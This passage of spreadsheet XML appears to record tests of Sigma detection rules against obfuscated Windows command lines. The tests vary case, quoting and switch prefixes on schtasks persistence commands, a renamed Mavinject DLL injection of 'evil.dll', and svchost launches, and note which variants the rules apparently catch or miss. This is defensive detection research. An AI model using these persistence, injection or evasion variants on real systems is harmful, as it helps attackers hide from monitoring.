          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J111" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K111" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="112" ht="15.75" customHeight="1" s="42">
      <c r="A112" s="43" t="n"/>
      <c r="B112" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C112" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D112" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E112" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /sC ONCE /sT 00:00 /Tn "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /F</t>
        </is>
      </c>
      <c r="F112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G112" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H112" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I112" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J112" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K112" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="113" ht="15.75" customHeight="1" s="42">
      <c r="A113" s="43" t="n"/>
      <c r="B113" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C113" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D113" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E113" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONCE /ST 00:00 /"TN" "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /f</t>
        </is>
      </c>
      <c r="F113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G113" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H113" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I113" s="4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13" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K113" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="114" ht="15.75" customHeight="1" s="42">
      <c r="A114" s="43" t="n"/>
      <c r="B114" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C114" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D114" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E114" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CREAte /SC ONCE /St 00:00 /tN "UpdateTask" /tR "C:\\Windows\\Temp\\update.exe" /f</t>
        </is>
      </c>
      <c r="F114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G114" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H114" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I114" s="44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14" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K114" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="115" ht="15.75" customHeight="1" s="42">
      <c r="A115" s="43" t="n"/>
      <c r="B115" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C115" s="43" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D115" s="43" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E115" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /"SC" ONCE /St 00:00 -"TN" "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /F</t>
        </is>
      </c>
      <c r="F115" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G115" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H115" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I115" s="43" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J115" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K115" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="116" ht="15.75" customHeight="1" s="42">
      <c r="A116" s="44" t="n"/>
      <c r="B116" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C116" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D116" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E116" s="43" t="inlineStr">
        <is>
          <t>schtasks.exe /creaTE /sC ONCE -"ST" 00:00 /TN "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /f</t>
        </is>
      </c>
      <c r="F116" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G116" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H116" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I116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16" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K116" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="117" ht="15.75" customHeight="1" s="42">
      <c r="A117" s="43" t="n"/>
      <c r="B117" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C117" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D117" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E117" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONCE /ST 00:00 /tn "UpdateTask" /tr "C:\\Windows\\Temp\\update.exe" /"F"</t>
        </is>
      </c>
      <c r="F117" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G117" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H117" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I117" s="43" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation Involving Temp Folder (39019a4e-317f-4ce3-ae63-309a8c6b53c5); Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J117" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K117" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="118" ht="15.75" customHeight="1" s="42">
      <c r="A118" s="43" t="n"/>
      <c r="B118" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_sysnative</t>
        </is>
      </c>
      <c r="C118" s="44" t="inlineStr">
        <is>
          <t>Process Creation Using Sysnative Folder</t>
        </is>
      </c>
      <c r="D118" s="44" t="inlineStr">
        <is>
          <t>3c1b5fb0-c72f-45ba-abd1-4d4c353144ab</t>
        </is>
      </c>
      <c r="E118" s="44" t="inlineStr">
        <is>
          <t>C:/Windows/Sysnative/cmd.exe</t>
        </is>
      </c>
      <c r="F118" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G118" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H118" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I118" s="44" t="n"/>
      <c r="J118" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K118" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="119" ht="15.75" customHeight="1" s="42">
      <c r="A119" s="43" t="n"/>
      <c r="B119" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_svchost_execution_with_no_cli_flags</t>
        </is>
      </c>
      <c r="C119" s="44" t="inlineStr">
        <is>
          <t>Suspect Svchost Activity</t>
        </is>
      </c>
      <c r="D119" s="44" t="inlineStr">
        <is>
          <t>16c37b52-b141-42a5-a3ea-bbe098444397</t>
        </is>
      </c>
      <c r="E119" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\svchost.exe -k netsvcs</t>
        </is>
      </c>
      <c r="F119" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G119" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H119" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I119" s="44" t="inlineStr">
        <is>
          <t>Uncommon Svchost Parent Process (01d2e2a1-5f09-44f7-9fc1-24faa7479b6d)</t>
        </is>
      </c>
      <c r="J119" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K119" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="120" ht="15.75" customHeight="1" s="42">
      <c r="A120" s="43" t="n"/>
      <c r="B120" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_svchost_execution_with_no_cli_flags</t>
        </is>
      </c>
      <c r="C120" s="44" t="inlineStr">
        <is>
          <t>Suspect Svchost Activity</t>
        </is>
      </c>
      <c r="D120" s="44" t="inlineStr">
        <is>
          <t>16c37b52-b141-42a5-a3ea-bbe098444397</t>
        </is>
      </c>
      <c r="E120" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\svchost.exe /"k" netsvcs</t>
        </is>
      </c>
      <c r="F120" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G120" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H120" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I120" s="44" t="inlineStr">
        <is>
          <t>Uncommon Svchost Parent Process (01d2e2a1-5f09-44f7-9fc1-24faa7479b6d)</t>
        </is>
      </c>
      <c r="J120" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K120" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="121" ht="15.75" customHeight="1" s="42">
      <c r="A121" s="43" t="n"/>
      <c r="B121" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_svchost_execution_with_no_cli_flags</t>
        </is>
      </c>
      <c r="C121" s="44" t="inlineStr">
        <is>
          <t>Suspect Svchost Activity</t>
        </is>
      </c>
      <c r="D121" s="44" t="inlineStr">
        <is>
          <t>16c37b52-b141-42a5-a3ea-bbe098444397</t>
        </is>
      </c>
      <c r="E121" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\svchost.exe -K netsvcs</t>
        </is>
      </c>
      <c r="F121" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G121" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H121" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I121" s="44" t="inlineStr">
        <is>
          <t>Uncommon Svchost Parent Process (01d2e2a1-5f09-44f7-9fc1-24faa7479b6d)</t>
        </is>
      </c>
      <c r="J121" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K121" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="122" ht="15.75" customHeight="1" s="42">
      <c r="A122" s="43" t="n"/>
      <c r="B122" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_svchost_execution_with_no_cli_flags</t>
        </is>
      </c>
      <c r="C122" s="44" t="inlineStr">
        <is>
          <t>Suspect Svchost Activity</t>
        </is>
      </c>
      <c r="D122" s="44" t="inlineStr">
        <is>
          <t>16c37b52-b141-42a5-a3ea-bbe098444397</t>
        </is>
      </c>
      <c r="E122" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\svchost.exe /k netsvcs</t>
        </is>
      </c>
      <c r="F122" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G122" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H122" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I122" s="44" t="inlineStr">
        <is>
          <t>Uncommon Svchost Parent Process (01d2e2a1-5f09-44f7-9fc1-24faa7479b6d)</t>
        </is>
      </c>
      <c r="J122" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K122" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="123" ht="15.75" customHeight="1" s="42">
      <c r="A123" s="43" t="n"/>
      <c r="B123" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_svchost_execution_with_no_cli_flags</t>
        </is>
      </c>
      <c r="C123" s="44" t="inlineStr">
        <is>
          <t>Suspect Svchost Activity</t>
        </is>
      </c>
      <c r="D123" s="44" t="inlineStr">
        <is>
          <t>16c37b52-b141-42a5-a3ea-bbe098444397</t>
        </is>
      </c>
      <c r="E123" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\svchost.exe -"k" netsvcs</t>
        </is>
      </c>
      <c r="F123" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G123" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H123" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I123" s="44" t="inlineStr">
        <is>
          <t>Uncommon Svchost Parent Process (01d2e2a1-5f09-44f7-9fc1-24faa7479b6d)</t>
        </is>
      </c>
      <c r="J123" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K123" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="124" ht="15.75" customHeight="1" s="42">
      <c r="A124" s="44" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B124" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C124" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D124" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E124" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /injECTrUnnING C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F124" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H124" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I124" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process (4f73421b-5a0b-4bbf-a892-5a7fb99bea66); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J124" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K124" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="125" ht="15.75" customHeight="1" s="42">
      <c r="A125" s="44" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B125" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C125" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D125" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E125" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /InJecTRunninG C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F125" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G125" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H125" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I125" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process (4f73421b-5a0b-4bbf-a892-5a7fb99bea66); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J125" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K125" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="126" ht="15.75" customHeight="1" s="42">
      <c r="A126" s="44" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B126" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C126" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D126" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E126" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /"INJECTRUNNING" C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F126" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G126" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H126" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I126" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J126" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K126" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="127" ht="15.75" customHeight="1" s="42">
      <c r="A127" s="44" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B127" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C127" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D127" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E127" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 -"INJECTRUNNING" C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F127" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G127" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I127" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J127" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K127" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="128" ht="15.75" customHeight="1" s="42">
      <c r="A128" s="44" t="inlineStr">
        <is>
          <t>t1055.001</t>
        </is>
      </c>
      <c r="B128" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C128" s="44" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D128" s="44" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E128" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /injeCtRuNNING C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F128" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G128" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H128" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I128" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process (4f73421b-5a0b-4bbf-a892-5a7fb99bea66); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J128" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K128" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="129" ht="15.75" customHeight="1" s="42">
      <c r="A129" s="43" t="n"/>
      <c r="B129" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C129" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D129" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E129" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /ST 08:00</t>
        </is>
      </c>
      <c r="F129" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G129" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H129" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I129" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J129" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K129" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="130" ht="15.75" customHeight="1" s="42">
      <c r="A130" s="43" t="n"/>
      <c r="B130" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C130" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D130" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E130" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CReatE -"TN" EvilTask /TR "C:\Windows\System32\calc.exe" /sc WEEKLY -"D" MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F130" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G130" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H130" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I130" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J130" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K130" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="131" ht="15.75" customHeight="1" s="42">
      <c r="A131" s="43" t="n"/>
      <c r="B131" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C131" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D131" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E131" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /cReatE /TN EvilTask /TR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F131" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G131" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H131" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I131" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J131" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K131" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="132" ht="15.75" customHeight="1" s="42">
      <c r="A132" s="43" t="n"/>
      <c r="B132" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C132" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D132" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E132" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H132" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I132" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J132" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K132" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="133" ht="15.75" customHeight="1" s="42">
      <c r="A133" s="43" t="n"/>
      <c r="B133" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C133" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D133" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E133" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /TN EvilTask /"TR" "C:\Windows\System32\calc.exe" /sc WEEKLY /d MON /ST 08:00</t>
        </is>
      </c>
      <c r="F133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I133" s="44" t="n"/>
      <c r="J133" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K133" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="134" ht="15.75" customHeight="1" s="42">
      <c r="A134" s="43" t="n"/>
      <c r="B134" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C134" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D134" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E134" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /"TN" EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /d MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I134" s="43" t="n"/>
      <c r="J134" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K134" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="135" ht="15.75" customHeight="1" s="42">
      <c r="A135" s="43" t="n"/>
      <c r="B135" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C135" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D135" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E135" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" -"TN" EvilTask /tR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON /st 08:00</t>
        </is>
      </c>
      <c r="F135" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G135" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H135" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I135" s="44" t="n"/>
      <c r="J135" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K135" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="136" ht="15.75" customHeight="1" s="42">
      <c r="A136" s="43" t="n"/>
      <c r="B136" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C136" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D136" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E136" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTe /TN EvilTask -"TR" "C:\Windows\System32\calc.exe" /"SC" WEEKLY -"D" MON /ST 08:00</t>
        </is>
      </c>
      <c r="F136" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G136" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H136" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I136" s="43" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J136" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K136" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="137" ht="15.75" customHeight="1" s="42">
      <c r="A137" s="43" t="n"/>
